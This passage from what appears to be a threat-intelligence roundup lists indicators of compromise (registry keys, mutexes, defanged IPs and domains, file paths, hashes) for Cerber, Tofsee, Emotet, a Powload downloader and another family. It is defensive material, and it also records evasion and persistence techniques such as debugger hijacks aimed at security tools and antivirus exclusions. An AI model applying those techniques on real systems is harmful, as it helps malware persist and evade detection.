<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\WUAUCLT.EXE
Value Name: Debugger
28
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\HIJACKTHIS.EXE
Value Name: Debugger
28
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\MBAM.EXE
Value Name: Debugger
28
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\MBAMGUI.EXE
Value Name: Debugger
28
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\MBAMSERVICE.EXE
Value Name: Debugger
28
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\SBIESVC.EXE
Value Name: Debugger
28
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\SANDBOXIEWUAU.EXE
Value Name: Debugger
28
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\SANDBOXIEBITS.EXE
Value Name: Debugger
28
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\SANDBOXIECRYPTO.EXE
Value Name: Debugger
28
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\SANDBOXIEDCOMLAUNCH.EXE
Value Name: Debugger
28
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\SANDBOXIERPCSS.EXE
Value Name: Debugger
28
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\SBIECTRL.EXE
Value Name: Debugger
28
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\COMBOFIX.EXE
Value Name: Debugger
28
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\PEV.EXE
Value Name: Debugger
28
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\HIDEC.EXE
Value Name: Debugger
28
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\SWREG.EXE
Value Name: Debugger
28
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\HELPPANE.EXE
Value Name: Debugger
28
<HKCU>\CONTROL PANEL\SOUND
Value Name: Beep
28
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
Value Name: NoFile
28
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SR
Value Name: Start
28
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
Value Name: NoFolderOptions
28
MutexesOccurrences
!PrivacIE!SharedMem!Mutex28
Local\VERMGMTBlockListFileMutex28
Local\!BrowserEmulation!SharedMemory!Mutex28
Local\URLBLOCK_DOWNLOAD_MUTEX28
Local\URLBLOCK_HASHFILESWITCH_MUTEX28
UpdatingNewTabPageData28
{5312EE61-79E3-4A24-BFE1-132B85B23C3A}28
{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}28
!IEFileUpdater!Mutex28
Local\InternetExplorerDOMStoreQuota28
©Úü×À»¢Íéõèò©28
Local\https://www.hugedomains.com/28
Local\https://tiny.cc/27
Local\http://mediadiscovery.net/20
Local\http://widgets.outbrain.com/13
Local\URLBLOCK_FILEMAPSWITCH_MUTEX_12523
Local\URLBLOCK_FILEMAPSWITCH_MUTEX_11763
IsoScope_13c_ConnHashTable<316>_HashTable_Mutex2
Local\URLBLOCK_FILEMAPSWITCH_MUTEX_3162
Local\URLBLOCK_FILEMAPSWITCH_MUTEX_16042
Local\URLBLOCK_FILEMAPSWITCH_MUTEX_18762
IsoScope_1f0_ConnHashTable<496>_HashTable_Mutex2
Local\URLBLOCK_FILEMAPSWITCH_MUTEX_4962
Local\URLBLOCK_FILEMAPSWITCH_MUTEX_19321
Local\URLBLOCK_FILEMAPSWITCH_MUTEX_19641
See JSON for more IOCs
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
204[.]79[.]197[.]20028
172[.]217[.]10[.]428
172[.]217[.]12[.]20628
72[.]21[.]81[.]20028
216[.]87[.]78[.]2528
172[.]217[.]3[.]10627
172[.]217[.]7[.]327
23[.]20[.]239[.]1227
192[.]35[.]177[.]6427
192[.]241[.]240[.]8927
72[.]52[.]179[.]17527
107[.]22[.]223[.]16327
23[.]10[.]130[.]15526
172[.]217[.]6[.]19425
104[.]25[.]37[.]10825
199[.]59[.]242[.]15125
172[.]217[.]164[.]13225
107[.]178[.]240[.]8925
172[.]217[.]15[.]7425
96[.]6[.]58[.]425
67[.]225[.]218[.]5025
104[.]25[.]38[.]10822
173[.]192[.]200[.]7022
199[.]59[.]242[.]16821
104[.]28[.]29[.]3221
See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
cdnjs[.]cloudflare[.]com28
www[.]easycaptchas[.]com28
secure[.]statcounter[.]com28
cdn[.]pubguru[.]com28
fonts[.]gstatic[.]com27
ib[.]adnxs[.]com27
www[.]googletagservices[.]com27
bit[.]ly27
HDRedirect-LB5-1afb6e2973825a56[.]elb[.]us-east-1[.]amazonaws[.]com27
static[.]hugedomains[.]com27
www[.]hugedomains[.]com27
apps[.]digsigtrust[.]com27
apps[.]identrust[.]com27
tiny[.]cc27
fastlane[.]rubiconproject[.]com27
m2d[.]m2[.]ai27
cdn[.]convertcart[.]com27
tinyurl[.]com27
directorio-w[.]com27
www[.]qseach[.]com27
www[.]directorio-w[.]com27
bidder[.]komoona[.]com27
c[.]statcounter[.]com26
web[.]hb[.]ad[.]cpe[.]dotomi[.]com26
securepubads[.]g[.]doubleclick[.]net25
See JSON for more IOCs
Files and or directories createdOccurrences
%LOCALAPPDATA%Low\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico28
%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\7V3XNPL2\favicon[2].ico28
%APPDATA%\Microsoft\Windows\Cookies\A71QDCIP.txt28
%APPDATA%\Microsoft\Windows\Cookies\VF90XW39.txt28
%System32%\drivers\etc\hosts28
%APPDATA%\Microsoft\Windows\Cookies\HW3YF7T7.txt28
%ProgramFiles(x86)%\Mozilla Firefox\searchplugins\google.xml28
%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\7V3XNPL2\urlblockindex[1].bin28
%HOMEPATH%\27F6471627473796E696D64614\winlogon.exe28
%APPDATA%\Microsoft\Windows\Cookies\SISHQLM4.txt28
%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\7V3XNPL2\domain_profile[1].htm28
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\winlogon.exe28
%ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup\winlogon.exe28
%ProgramData%\Microsoft\Windows\Start Menu\Programs\winlogon.exe28
%ProgramData%\Microsoft\Windows\Start Menu\winlogon.exe28
%APPDATA%\Microsoft\Windows\Start Menu\Programs\winlogon.exe28
%APPDATA%\Microsoft\Windows\Start Menu\winlogon.exe28
%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\7V3XNPL2\domain_profile[1].cfm27
%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\6YL4T24G\t[1].gif27
%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\7V3XNPL2\t[1].gif27
%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\1NSKV6K6\domain_profile[1].htm26
%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\1NSKV6K6\domain_profile[1].cfm26
%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\SSZWDDXW\domain_profile[1].htm26
%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\7V3XNPL2\px[1].gif26
%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\SSZWDDXW\t[1].gif26
See JSON for more IOCs
File Hashes
  • 2e9167886bb73eb0f56b7a64245a5bf4a87b9321cf9c32f2c93c646c32223eef
  • 2f6cdf0428403cbefc3d9b4ac5b906b56f202c952eafa49b1a6d4b4394e7ba9d
  • 4448b12c3707f70823189f20d310846d2b9de24ca3b76f33e345358d14dfd7c0
  • 472fd77b2a880f424513a2b2ec18a1dd6ac8f15f4756787d10818d35c344e8ab
  • 558cebedb7814ef92e02b020a444ed6a0dcb23dec761ccd3270548911f646c2b
  • 686aa9a0dc49bdd733c78b6ff0f180b2887696365a6304069db8a485913c21de
  • 68c892240aee5b55b6b8fb19593b9378fd7f23d42318566d73c4fbc42a77776d
  • 80d68a9698e2f598f7c703d78eaa8a500d5f716cb93009d5cc1bacef47f88e2a
  • 84aaafc52bd192f0bd17ea8e5dd34318c28a6ac87a84fa3efd629e3f9f3bf0b2
  • 9994bd60526b01b3631a7b4ec012f50251966a0cb841b7ec583d12a374df24e8
  • 9abc698de28993cd3f687686e12bca1b185dfb8687c4751b47ce7a265167725a
  • 9b45576ccb59e5b083892fe7d6154cd8c3a0795088db2053f770b589f2769108
  • a66292bc2d1c99dfb5e8c870444e603798c923ecba4ac633f88d4430b19731a7
  • aadb0c76ee084384a9acbd3981a5c22e39431a45c82438a8f8b245043b1dc05b
  • aec1d3b9323fde4b0d192c7e4b4448d517b180f4776a0cbd266b3c0d843c1214
  • b021e5e867ed34c56aae7007ccdb0965c59d49b621a6aa3f3c4052f69e082b79
  • b05f01500646b2d52b30d146a39d07047311e200a4215afef7c6ff45f1e8279b
  • b156f81c67063ebde12bd89572d4f8fce933e725c2d6b2deab80f767bb5e6faf
  • b322ada9d35b5e884d7c2c63ede85a1e11d1b2ab7d136e0c05b14cdafe8c5423
  • b871a929a4c5bbeed88387296c7270ec20c76f40361ba87e0aa84a63a16c748b
  • bbc346b483d913d44549fcff8e6a240fa3e035bbbd468299d72a7a33b447cb6e
  • bf32e669b25059e41d0f296d183136c796030374a5fc848eb5dcd6b9020283c8
  • c72efd27ec54698b361fae7dceb14bd6dfe8883ffcc29c0d8e25fecd83249ffe
  • ca1dbce8a0e3ff901cb022b57267673ee9d1f6f42384189be4eb670c44796e45
  • d0a2e479604e92ece7d75295260f938091a62b807999a993d7c5377a4fbe3ca1
  • See JSON for more IOCs

Coverage


Screenshots of Detection

AMP



ThreatGrid



Umbrella



Doc.Downloader.Powload-6952235-0


Indicators of Compromise


Registry KeysOccurrences
<HKCR>\INTERFACE\{8BD21D42-EC42-11CE-9E0D-00AA006002F3} 25
<HKCR>\INTERFACE\{8BD21D52-EC42-11CE-9E0D-00AA006002F3} 25
<HKCR>\INTERFACE\{8BD21D62-EC42-11CE-9E0D-00AA006002F3} 25
<HKCR>\INTERFACE\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F} 25
<HKCR>\INTERFACE\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F} 25
<HKCR>\INTERFACE\{79176FB2-B7F2-11CE-97EF-00AA006D2776} 25
<HKCR>\INTERFACE\{4C5992A5-6926-101B-9992-00000B65C6F9} 25
<HKCR>\INTERFACE\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D} 25
<HKCR>\INTERFACE\{47FF8FE0-6198-11CF-8CE8-00AA006CB389} 25
<HKCR>\INTERFACE\{47FF8FE1-6198-11CF-8CE8-00AA006CB389} 25
<HKCR>\INTERFACE\{47FF8FE2-6198-11CF-8CE8-00AA006CB389} 25
<HKCR>\INTERFACE\{47FF8FE3-6198-11CF-8CE8-00AA006CB389} 25
<HKCR>\INTERFACE\{47FF8FE4-6198-11CF-8CE8-00AA006CB389} 25
<HKCR>\INTERFACE\{47FF8FE5-6198-11CF-8CE8-00AA006CB389} 25
<HKCR>\INTERFACE\{47FF8FE6-6198-11CF-8CE8-00AA006CB389} 25
<HKCR>\INTERFACE\{47FF8FE8-6198-11CF-8CE8-00AA006CB389} 25
<HKCR>\INTERFACE\{47FF8FE9-6198-11CF-8CE8-00AA006CB389} 25
<HKCR>\INTERFACE\{5CEF5613-713D-11CE-80C9-00AA00611080} 25
<HKCR>\INTERFACE\{92E11A03-7358-11CE-80CB-00AA00611080} 25
<HKCR>\INTERFACE\{04598FC9-866C-11CF-AB7C-00AA00C08FCF} 25
<HKCR>\INTERFACE\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F} 25
<HKLM>\SOFTWARE\Classes\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3} 25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\sourcebulk 25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SOURCEBULK
Value Name: Type
25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SOURCEBULK
Value Name: Start
25
MutexesOccurrences
Global\I98B68E3C25
Global\M98B68E3C25
Global\Nx534F51BC1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
152[.]168[.]82[.]16725
197[.]91[.]152[.]9325
47[.]99[.]85[.]12225
66[.]228[.]45[.]12915
77[.]82[.]85[.]3515
239[.]255[.]255[.]2501
216[.]98[.]148[.]1571
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
dudumb[.]com25
Files and or directories createdOccurrences
%SystemRoot%\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat25
%HOMEPATH%\778.exe25
\REGISTRY\MACHINE\SOFTWARE\Classes\Word.Document.81
%System32%\en-US\tzres.dll.mui1
%System32%\WindowsPowerShell\v1.0\FileSystem.format.ps1xml1
%SystemRoot%\SysWOW64\bVjUjfFnlezvN1Uus.exe1
%SystemRoot%\SysWOW64\Iv7bzYqWHO4xGd.exe1
%SystemRoot%\SysWOW64\Kyo1lmFLAsBgZNy.exe1
%SystemRoot%\SysWOW64\AsiXrqyEtbD.exe1
%TEMP%\CVRB4E.tmp1
%SystemRoot%\SysWOW64\4lfjNl8nHPqt1Js4Bp.exe1
%SystemRoot%\SysWOW64\fVyEM3EWs7XQ.exe1
%SystemRoot%\SysWOW64\rwzinD3GMw1HRORxO.exe1
%SystemRoot%\SysWOW64\myqCWvEqggyRaDCYm.exe1
%SystemRoot%\SysWOW64\QrGtyKE.exe1
%SystemRoot%\SysWOW64\EWRwGw7IYRd.exe1
%SystemRoot%\SysWOW64\BDlBrj99pY7wbdknU.exe1
%SystemRoot%\SysWOW64\ti93nsoZWFJbLoZ.exe1
%SystemRoot%\SysWOW64\10czIsyY6Qn52PBJ8.exe1
%SystemRoot%\SysWOW64\gCOkjmOgE39uf7.exe1
%SystemRoot%\SysWOW64\a9xRIWvuM1dZbNKU.exe1
%SystemRoot%\SysWOW64\hsCc2.exe1
%SystemRoot%\splwow64.exe1
%SystemRoot%\SysWOW64\EFTI4zp.exe1
%SystemRoot%\SysWOW64\swlZVw2znOToKUOSMk.exe1
See JSON for more IOCs
File Hashes
  • 01664c310c364946846933f45a9db25326db7133275446e38e7eccd56f2b80b4
  • 14c53e5330f82bf1449cda84130abcf0b3ffe2ce29d16a6d7a8b3c17601bffea
  • 185d2c002d778f0fec20cd7a6cb749d19577b95839be3cb7af13916e6870a7ef
  • 1ecfe0e89a380160df4b62d4b56321bfad3624ea07334f4271b9b3a0de323fdf
  • 1f2acd076d0c1aaf5832d9c30ca76cd469562fd79625b308714e87e029379052
  • 2cdc8b8fa281a4b2ab63a8f8098a71dc05d50dc06858cb0ae701487608bda79f
  • 37317c48991a92e9deb17122cc64e572e9dac5402cf89aa47db8866ba9ea93e0
  • 37f9cc3f495f80e03c1454869205d757959c9f46171ae6cb7ded62bb6a4bc37f
  • 3fa5e87f6b8331816fb77091303df6c30a124c8359cdee61127a05353c561961
  • 42c76634b3baf9017b152bfd49863669f3aaa5423f084bc4fde730587e07d8fe
  • 4832624b2bbc3d9a98ecea0d2e9ae0db57f90d6cc314a7fddc86521edd7bd979
  • 500e41605b772679750255bfae4e6c369051ff64ca3aceae7e1d32c859529f1d
  • 748968b90d8f84cec298ea1edb0cf037a4eb580b8c0dbcb10f3252f520a3b5a6
  • 7cbd6f18182bf68d5506a164a42bff14759a2be77b5adc5f35e77a7ba68fbe12
  • 7d5f2a044fc3fff1aa2053a86da81068c53c12ed8b9ad4b2adf7693a73e134b4
  • 8284710f69f25d748299231f7764e53fc963049bd46fd0aed36146868d8e3df3
  • 8f8e289691e3f7a6ad872a72c601d634e825972c9562d8f849bc571026327f62
  • 97ec98bb0661fb192eac75f8e184d56dd2ce8395cf1b7420ed2975f372cca267
  • a05e3987b94e0dde5d20f902133a5571ee60ecf7e077e4497be5183bbb472d9e
  • a29afb3beb3244232df4083ba09eac61a60c2f1a23108f60d1205d43a7be59ec
  • a791c7c95cb9310ab719abebc47c63424ffaab3ea180ff71ea369f33c1c1061c
  • b0c3ffe7cf0c331ad9a44790ad48c6b57ed7b38d3612aba23e8a02685735531c
  • bf4f44397b89e0103a1422962049db2e6935ee3b89575131baf195aab69c41ed
  • c2c3d7e6e279d271edcc78b072b24e0ada5c0f4a83e997a33ed26953bc951f23
  • c5710bc33402f7e096d1518df37b1e43e7a5de4286863f3a5840543e2bae9e9d
  • See JSON for more IOCs

Coverage


Screenshots of Detection

AMP




ThreatGrid



Umbrella



Malware



Win.Ransomware.Cerber-6952131-0


Indicators of Compromise


Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: internat.exe
14
<HKCU>\Software\AppDataLow\Software\Microsoft\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 14
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: api-PQEC
14
<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
Value Name: Client
14
<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
Value Name: {F50EA47E-D053-EF14-82F9-0493D63D7877}
14
MutexesOccurrences
{A7AAF118-DA27-71D5-1CCB-AE35102FC239}14
Local\{57025AD2-CABB-A1F8-8C7B-9E6580DFB269}14
Local\{7FD07DA6-D223-0971-D423-264D4807BAD1}14
Local\{B1443895-5CF6-0B1E-EE75-506F02798413}14
{8303E239-0653-AD8E-2867-9A31DC8B6EF5}4
{07C292C9-BA97-D1C3-FC2B-8E95F08FA299}2
{FB179D42-1E2D-E531-005F-32E93403862D}2
{6B06C8E1-CEE8-D5D9-30CF-E2D96473361D}1
{97FA9976-0AD7-E1DA-CCBB-DEA5C01FF2A9}1
{AFC31B69-429D-B93B-C453-96FD38372A81}1
{E73AB138-1AFB-B10F-5C0B-EE75506F0279}1
{C352A3DA-46D9-EDDF-68A7-DA711CCBAE35}1
{3FA15864-923D-C93F-94E3-E60D08C77A91}1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
87[.]106[.]18[.]14114
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
groupcreatedt[.]at14
Files and or directories createdOccurrences
%APPDATA%\Mozilla\Firefox\Profiles\1lcuq8ab.default\prefs.js14
%APPDATA%\Microsoft\Dmlogpui14
%APPDATA%\Microsoft\Dmlogpui\datat3hc.exe14
%TEMP%\5932\2C99.bat1
%TEMP%\65B0\B2D8.bat1
%TEMP%\C9241
%TEMP%\C924\E492.tmp1
%TEMP%\C924\E492.bat1
\TEMP\670E9F~1.EXE1
%TEMP%\C1A41
%TEMP%\C1A4\60D2.tmp1
%TEMP%\C1A4\60D2.bat1
\TEMP\708D16~1.EXE1
%TEMP%\F6A81
%TEMP%\F6A8\30.bat1
\TEMP\AE71FB~1.EXE1
%TEMP%\752A1
%TEMP%\752A\BA95.tmp1
%TEMP%\752A\BA95.bat1
\TEMP\7634AC~1.EXE1
%TEMP%\5FB81
%TEMP%\5FB8\AFDC.tmp1
%TEMP%\5FB8\AFDC.bat1
\TEMP\B89CC6~1.EXE1
%TEMP%\17241
See JSON for more IOCs
File Hashes
  • 55c79a0a7d5bc93ae1e0edcbd6c838fa361e67d404f8f38089939a01d5cc27c5
  • 670e9fc88468a253b00e9ca9783baccebcc6effa0c5902026b649da6b72f3249
  • 708d163c05a5986c1691f48bbff37ccfda13cda6704d6a1a9ac0e295dc6739ae
  • 7634ace88199348cc6bff675c216b9d26c13803d59bc112eae19188cd535a565
  • 77517b420d96ac130c586d567b3ce4f12ef34918e268339758cd663a54296806
  • ae71fb978b5abbff24740db3a7e083392f3301e46ad2b904064e9f48825bc52e
  • b36d27dd1a266aa0e29131e78835a4b00ff337bc4ccd72af1cc16af93d252cc7
  • b89cc647d71b28c7bd382299e7b574ad6dfd7ecbcf6dae011513874c5a5ddab6
  • ba0bbae843fd8675f57e7cf62b1f48781de38c25adb33e64083cd1af1b2b2f69
  • c7f6fb53efdb5080fdb1fa29c84c66eb7e63369a1525dc84586eaee5ec942589
  • c8e133e78982e35707b339263fdbb89e41c8b02e9eb80a89255c982fe07374ba
  • cd16db51872581108c2e9beb6a2ba93153c67f85db299f10b4fe11f6e7a8a19d
  • d9891ebd33d5b507598c11c6855c5dae0c10e4c8a41069020ca9c786960b30d4
  • ee85ff6ee5b001904f3ba1be01d3e7f67e7fdcf222a39f5a1e451be999b8e18c

Coverage


Screenshots of Detection

AMP



ThreatGrid



Umbrella



Win.Packed.Tofsee-6952124-0


Indicators of Compromise


Registry KeysOccurrences
<HKLM>\System\CurrentControlSet\Services\NapAgent\Shas 17
<HKLM>\System\CurrentControlSet\Services\NapAgent\Qecs 17
<HKLM>\System\CurrentControlSet\Services\NapAgent\LocalConfig 17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NAPAGENT\LOCALCONFIG\Enroll\HcsGroups 17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NAPAGENT\LOCALCONFIG\UI 17
<HKU>\.DEFAULT\Control Panel\Buses 17
<HKU>\Software\Microsoft\Windows\ShellNoRoam\MUICache 17
<HKU>\Software\Microsoft\Windows NT\CurrentVersion\Winlogon 17
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config0
17
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config1
17
<HKU>\Control Panel\Buses 17
<HKLM>\System\CurrentControlSet\Control\SecurityProviders\Schannel 16
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config3
16
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config2
16
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\yrflksyn
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\yrflksyn 6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\YRFLKSYN
Value Name: Type
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\YRFLKSYN
Value Name: Start
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\YRFLKSYN
Value Name: ErrorControl
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\YRFLKSYN
Value Name: DisplayName
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\YRFLKSYN
Value Name: WOW64
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\YRFLKSYN
Value Name: ObjectName
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\YRFLKSYN
Value Name: Description
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\YRFLKSYN
Value Name: ImagePath
6
<HKLM>\SYSTEM\ControlSet001\Services\ylrseput 3
MutexesOccurrences
Global\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb717
liqbftsowkinegql17
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
69[.]55[.]5[.]25017
144[.]76[.]199[.]4317
98[.]136[.]96[.]7317
98[.]136[.]101[.]11617
176[.]111[.]49[.]4317
46[.]4[.]52[.]10917
144[.]76[.]199[.]217
85[.]25[.]119[.]2517
117[.]53[.]114[.]1517
67[.]195[.]228[.]8717
66[.]218[.]85[.]15117
64[.]98[.]36[.]417
43[.]231[.]4[.]717
98[.]137[.]157[.]4317
52[.]73[.]137[.]22217
167[.]206[.]4[.]7917
34[.]212[.]80[.]5417
18[.]209[.]118[.]13917
172[.]217[.]164[.]13217
94[.]23[.]27[.]3817
65[.]20[.]0[.]4916
35[.]162[.]106[.]15416
167[.]206[.]4[.]7716
74[.]208[.]5[.]416
208[.]89[.]132[.]2716
See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
smtp[.]secureserver[.]net17
mx-aol[.]mail[.]gm0[.]yahoodns[.]net17
mx[.]lycos[.]com[.]cust[.]b[.]hostedemail[.]com17
hotmail-com[.]olc[.]protection[.]outlook[.]com17
cxr[.]mx[.]a[.]cloudfilter[.]net17
aol[.]com17
mx[.]optimum[.]net17
comcast[.]net17
mail[.]com17
ntlworld[.]com17
naver[.]com17
earthlink[.]net17
cox[.]net17
optonline[.]net17
netzero[.]com17
gmx[.]net17
lycos[.]com17
netscape[.]net17
doctor[.]com17
mx[.]bt[.]lon5[.]cpcloud[.]co[.]uk16
btinternet[.]com16
mx0[.]charter[.]net16
tiscalinet[.]it16
mx0[.]gmx[.]com16
peoplepc[.]com16
See JSON for more IOCs
Files and or directories createdOccurrences
\net\NtControlPipe1017
%HOMEPATH%17
%SystemRoot%\SysWOW64\config\systemprofile:.repos17
%SystemRoot%\SysWOW64\config\systemprofile17
%SystemRoot%\SysWOW64\yrflksyn6
%SystemRoot%\SysWOW64\IPHLPAPI.DLL3
%TEMP%\wdqqtewr.exe1
%TEMP%\nmyuzjtg.exe1
%TEMP%\vmfipcon.exe1
%TEMP%\awqwcewn.exe1
%TEMP%\vrlrxzri.exe1
%TEMP%\euatucsb.exe1
%TEMP%\mmlrcqxa.exe1
%TEMP%\mkrnmvtk.exe1
%TEMP%\cahdclja.exe1
%TEMP%\nuhhkvni.exe1
%TEMP%\vlrkltjs.exe1
%System32%\huabnydc\younowmv.exe (copy)1
%TEMP%\mreehgwb.exe1
%TEMP%\wwvbmahk.exe1
%TEMP%\lkwsxhre.exe1
%TEMP%\tfgavrsp.exe1
%TEMP%\sefzuqro.exe1
%TEMP%\amnhcyzw.exe1
%System32%\sflmyjon\amnhcyzw.exe (copy)1
See JSON for more IOCs
File Hashes
  • 0cc2e91e71b1e5fef8599413fbc7c8b3fa3a4cdaa92452304bdbb38cdb6d1161
  • 15bf8fc46b91cb25730330dfbefcae2cb478e7ecbc18ac15d13b7b8eec01b697
  • 1d045908a196354bf1c0f0da5c4eeff5e7aaa36a1b5ee7f21764a7133e6ec4c8
  • 32a5d89a77130e01c19a58a0d3ff639d02c05ef2442f4e6b55a2e2b0a886926c
  • 32bce81459bff859b7adff1113f6bda122a804a25e44c0d38951ee3ed39a1557
  • 33e921f8c006374a78ab957ac1ce13183d65b4c633d2c7538c585d902f90ff44
  • 3d97b118c14ce36766873e178c9ef124936767dec5312806213dd295ed0d5448
  • 5c7ef91e7e96515dd59d0a252eca92d0d93a1bd9fa914eaf8c71933fcf7c8077
  • 7509fa7e6294d05e0f25f96ea99fb9ea8b791a08128580ae86dda44fcb6c6d55
  • 77cd1c22bb9099c666721a639bb980c1a5cde86cbc6323bc221f9184f6d9c092
  • 77da1a87f241047d70d54b5a3e85e8bab4e349b32c58818766b9965c9fd40949
  • a69d1518f15d8d435010727797a40d687be8069de1edc522facb0669ffda324e
  • cfb237792af9dea590b59278d9ec73c301309d961cb78f15651c7757782c0671
  • d20e573316508252a71fe9b8c7f32fbbb9daf110a9e7aa13188f713509aedaaa
  • da359fbb459923a0e385cbd80d5d7c7505d8596a32f777e280b5784c4ba9a382
  • df134bd359722960fdcd67d79900ff8350616e73f25ab1204e7a7a0232cdafec
  • f267501b0cd9862743e760e2c0686968019a68bf1a69843cea19b14c51773440

Coverage


Screenshots of Detection

AMP



ThreatGrid




Umbrella



Win.Malware.Emotet-6947486-0


Indicators of Compromise


Registry KeysOccurrences
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
Value Name: ProxyEnable
40
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
Value Name: ProxyServer
40
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
Value Name: ProxyOverride
40
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
Value Name: AutoConfigURL
40
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
Value Name: AutoDetect
40
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\sourcebulk 40
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SOURCEBULK
Value Name: Type
40
